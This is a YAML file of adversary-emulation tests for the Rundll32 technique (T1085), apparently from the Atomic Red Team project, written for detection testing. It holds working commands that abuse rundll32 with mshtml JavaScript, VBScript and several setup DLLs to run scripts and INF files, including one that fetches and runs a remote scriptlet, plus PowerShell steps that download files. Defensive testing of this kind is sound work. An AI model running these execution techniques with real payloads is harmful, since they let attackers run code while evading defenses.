---
attack_technique: T1085
display_name: Rundll32
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
  auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
  description: |
    Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
  supported_platforms:
    - windows
  input_arguments:
    file_url:
      description: location of the payload
      type: Url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct
  executor:
    name: command_prompt
    elevation_required: false
    command: |
      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();

- name: Rundll32 execute VBscript command
  auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
  description: |
    Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
    Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
    Upon execution calc.exe will be launched
  supported_platforms:
    - windows
  input_arguments:
    command_to_execute:
      description: Command for rundll32.exe to execute
      type: string
      default: calc.exe
  executor:
    name: command_prompt
    elevation_required: false
    command: |
      rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)

- name: Rundll32 advpack.dll Execution
  auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89
  description: |
    Test execution of a command using rundll32.exe with advpack.dll.
    Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml
    Upon execution calc.exe will be launched
  supported_platforms:
    - windows
  input_arguments:
    inf_to_execute:
      description: Local location of inf file
      type: string
      default: PathToAtomicsFolder\T1085\src\T1085.inf

  dependency_executor_name: powershell
  dependencies:
    - description: |
        Inf file must exist on disk at specified location (#{inf_to_execute})
      prereq_command: |
        if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
      get_prereq_command: |
        New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}"

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,

- name: Rundll32 ieadvpack.dll Execution
  auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9
  description: |
    Test execution of a command using rundll32.exe with ieadvpack.dll.
    Upon execution calc.exe will be launched

    Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
  supported_platforms:
    - windows
  input_arguments:
    inf_to_execute:
      description: Local location of inf file
      type: string
      default: PathToAtomicsFolder\T1085\src\T1085.inf

  dependency_executor_name: powershell
  dependencies:
    - description: |
        Inf file must exist on disk at specified location (#{inf_to_execute})
      prereq_command: |
        if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
      get_prereq_command: |
        New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}"

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,

- name: Rundll32 syssetup.dll Execution
  auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125
  description: |
    Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened

    Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
  supported_platforms:
    - windows
  input_arguments:
    inf_to_execute:
      description: Local location of inf file
      type: string
      default: PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf

  dependency_executor_name: powershell
  dependencies:
    - description: |
        Inf file must exist on disk at specified location (#{inf_to_execute})
      prereq_command: |
        if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
      get_prereq_command: |
        New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}"

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute}

- name: Rundll32 setupapi.dll Execution
  auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19
  description: |
    Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened

    Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
  supported_platforms:
    - windows
  input_arguments:
    inf_to_execute:
      description: Local location of inf file
      type: string
      default: PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf

  dependency_executor_name: powershell
  dependencies:
    - description: |
        Inf file must exist on disk at specified location (#{inf_to_execute})
      prereq_command: |
        if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
      get_prereq_command: |
        New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}"

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute}
